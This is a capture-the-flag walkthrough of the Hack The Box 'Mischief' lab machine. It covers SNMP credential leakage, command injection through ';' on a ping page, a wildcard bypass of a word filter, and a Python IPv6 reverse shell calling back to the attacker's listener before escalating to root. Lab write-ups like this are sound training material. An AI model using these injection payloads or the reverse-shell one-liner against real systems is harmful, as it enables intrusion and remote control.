HTB Mischief
10.10.10.92 | 50 pts | Tricked Badge
PART 1 : INITIAL RECON
$ nmap --min-rate 1000 -p- -sT -sU -v 10.10.10.92
22/tcp open ssh
3366/tcp open creativepartnr
161/udp open snmp
$ nmap -oN mischief -p 22,161,3366 -sC -sT -sU -sV -v 10.10.10.92
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
3366/tcp open caldav Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth:
| HTTP/1.0 401 Unauthorizedx0D
|_ Basic realm=Test
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html).
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 59m39s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Status: up
| Traffic stats: 0.67 Kb sent, 0.67 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:2c:07 (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
| Status: up
|_ Traffic stats: 618.08 Kb sent, 23.39 Mb received
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 10.10.10.92:22 10.10.14.213:32850
| TCP 10.10.10.92:22 10.10.14.213:32864
| TCP 10.10.10.92:22 10.10.15.54:40920
| TCP 10.10.10.92:22 10.10.16.63:40704
| TCP 10.10.10.92:3366 10.10.14.213:47812
| TCP 10.10.10.92:3366 10.10.14.213:47814
| TCP 10.10.10.92:3366 10.10.14.213:47816
| TCP 10.10.10.92:3366 10.10.14.213:47818
| TCP 10.10.10.92:3366 10.10.14.213:47820
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:34424 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-sysdescr: Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
|_ System uptime: 59m39.09s (357909 timeticks)
|_snmp-win32-software:
Service Info: Host: Mischief; OS: Linux; CPE: cpe:/o:linux:linux_kernel
NOTE(S):
An SNMP service is running at UDP PORT 161.
The web service running on TCP PORT 3366 is served using a Python BaseHTTPServer.
PART 2 : PORT ENUMERATION
UDP PORT 161 (snmp)
$ snmpwalk -c public 10.10.10.92 -v 2c
iso.3.6.1.2.1.1.1.0 = STRING: "Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (4642890) 12:53:48.90
iso.3.6.1.2.1.1.4.0 = STRING: "Me "
iso.3.6.1.2.1.1.5.0 = STRING: "Mischief"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
...omitted...
Processes (hrSWRunEntry
):
iso.3.6.1.2.1.25.4.2.1.4.608 = STRING: "python"
...omitted...
iso.3.6.1.2.1.25.4.2.1.5.608 = STRING: "-m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/"
...omitted...
The process for the hosted webservice is found.
HTTP Authentication credentials are found -
loki : godofmischiefisloki
The web service is hosted from
/home/loki/hosted
IPv6 Addresses (
ipAddressIfIndex
):$ snmpwalk -c public -v 2c 10.10.10.92 iso.3.6.1.2.1.4.34.1.3.2.16 iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1 iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.245.54 = INTEGER: 2 iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.245.54 = INTEGER: 2
The 1st one is the Loopback Address.
The 2ns one is the Unique-Local Address.
The 3rd one is the Link Local Address.
Evaluate the IPv6
address of the system:
unique_local_oid=$(snmpwalk -c public -v 2c 10.10.10.92 iso.3.6.1.2.1.4.34.1.3.2.16.222 | sed -ne 's/^.*\(222.*\) =.*$/\1/p')
unique_local_dec=$(echo $unique_local_oid | tr '.' ' ')
unique_local_hex=$(printf '%02x' $unique_local_dec)
ipv6=$(echo -n $unique_local_hex | fold -w4 | tr '\n' ':')
$ echo $ipv6
dead:beef:0000:0000:0250:56ff:fea4:29f2
See if there are other ports open for IPv6:
$ nmap -6 --min-rate 1000 -p- -v dead:beef:0000:0000:0250:56ff:fea4:29f2
22/tcp open ssh
80/tcp open http
$ nmap -6 -p22,80 -sC -sV -v $ipv6
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There is another http service open using IPv6.
TCP PORT 3366 (http, IPv4)
http://10.10.10.136
:

Using the credentials found during the SNMP enumeration -- loki:godofmischiefisloki

Two sets of credentials are found:
Username
Password
loki
godofmischiefisloki
loki
trickeryanddeceit
TCP PORT 80 (http, IPv6)
http://[dead:beef:0000:0000:0250:56ff:fea4:29f2]/

Attempting to log in using the credentials found on PORT 3366:

The credential pair, administrator : trickeryanddeceit
, worked and so far, only the ping
command could be executed. There is also a message written below.
In my home directory, i have my password in a file called credentials, Mr Admin
PART 3 : EXPLOITATION
Bypass the command execution in the service running on port 80:
$ ping -c 2 127.0.0.1; id
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.020 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.061 ms
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.020/0.040/0.061/0.021 ms
Command was executed succesfully!
$ id; ping -c 2 127.0.0.1
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Command was executed succesfully!
The command execution could be bypassed by using a ;
.
PART 4 : GENERATE USER SHELL
Take the file called credentials
from the home directory
:
$ echo /home/*; ping -c 2 127.0.0.1
/home/loki
Command was executed succesfully!
$ echo /home/loki/*; ping -c 2 127.0.0.1
/home/loki/credentials /home/loki/hosted /home/loki/user.txt
Command was executed succesfully!
$ cat /home/loki/credentials; ping -c 2 127.0.0.1
Command is not allowed.
$ cat /home/loki/cred*; ping -c 2 127.0.0.1
pass: lokiisthebestnorsegod
Command was executed succesfully!
The word, credentials
, is being filtered out by the service but it was bypassed by using a wildcard.
Logging in via ssh
:
$ ssh -l loki 10.10.10.92
The authenticity of host '10.10.10.92 (10.10.10.92)' can't be established.
ECDSA key fingerprint is SHA256:deaxXTK7ORthfGcKdblPRUmgNrU20oclqMbwVj3hzYI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.92' (ECDSA) to the list of known hosts.
$ [email protected]'s password: lokiisthebestnorsegod
$ cat user.txt
bf58........................0060
PART 5.1 : PRIVILEGE ESCALATION (loki -> root)
Check for interesting files in loki
's home directory:
$ ls -lah ~
-rw------- 1 loki loki 192 Jul 14 2018 .bash_history
...omitted...
-rw-rw-r-- 1 loki loki 28 May 17 2018 credentials
...omitted...
-rw-r--r-- 1 loki loki 0 May 14 2018 .sudo_as_admin_successful
-r-------- 1 loki loki 33 May 17 2018 user.txt
...omitted...
$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
...omitted...
sudo su
su
exit
su root
...omitted...
exit
There was an attempt to execute su root
in the .bash_history
. There is also a .sudo_as_admin_successful
which might mean the attempt was successful.
A previously unknown credential pair was used to initialize the python simpleHTTPAuthServer
and this might be a lead for the root password.
Attempting to execute su root
:
$ su root
-bash: /bin/su: Permission denied
Checking privileges for the su
command:
$ getfacl -R -s / 2>/dev/null | grep -A 9 su
# file: usr/bin/sudo
# owner: root
# group: root
# flags: s--
user::rwx
user:loki:r--
group::r-x
mask::r-x
other::r-x
# file: bin/su
# owner: root
# group: root
# flags: s--
user::rwx
user:loki:r--
group::r-x
mask::r-x
other::r-x
The user, loki
, only has read (r--
) permissions for both su
and sudo
. Good thing we still have access to another user -- www-data
PART 5.2 : PRIVILEGE ESCALATION (www-data -> root)
Set-up a listener for IPv6:
$ socat TCP6-LISTEN:4444 stdout
Execute an IPv6 reverse shell on the web service running on port 80:
$ python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::100e",4444,0,0));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'; ping -c 2 127.0.0.1
While inside the reverse shell:
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ su
$ Password: lokipasswordmischieftrickery
$ id
uid=0(root) gid=0(root) groups=0(root)
$ cat /root/root.txt
The flag is not here, get a shell to find it!
$ find / -name root.txt -type f -uid 0
/usr/lib/gcc/x86_64-linux-gnu/7/root.txt
/root/root.txt
$ cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
ae15........................7807
Last updated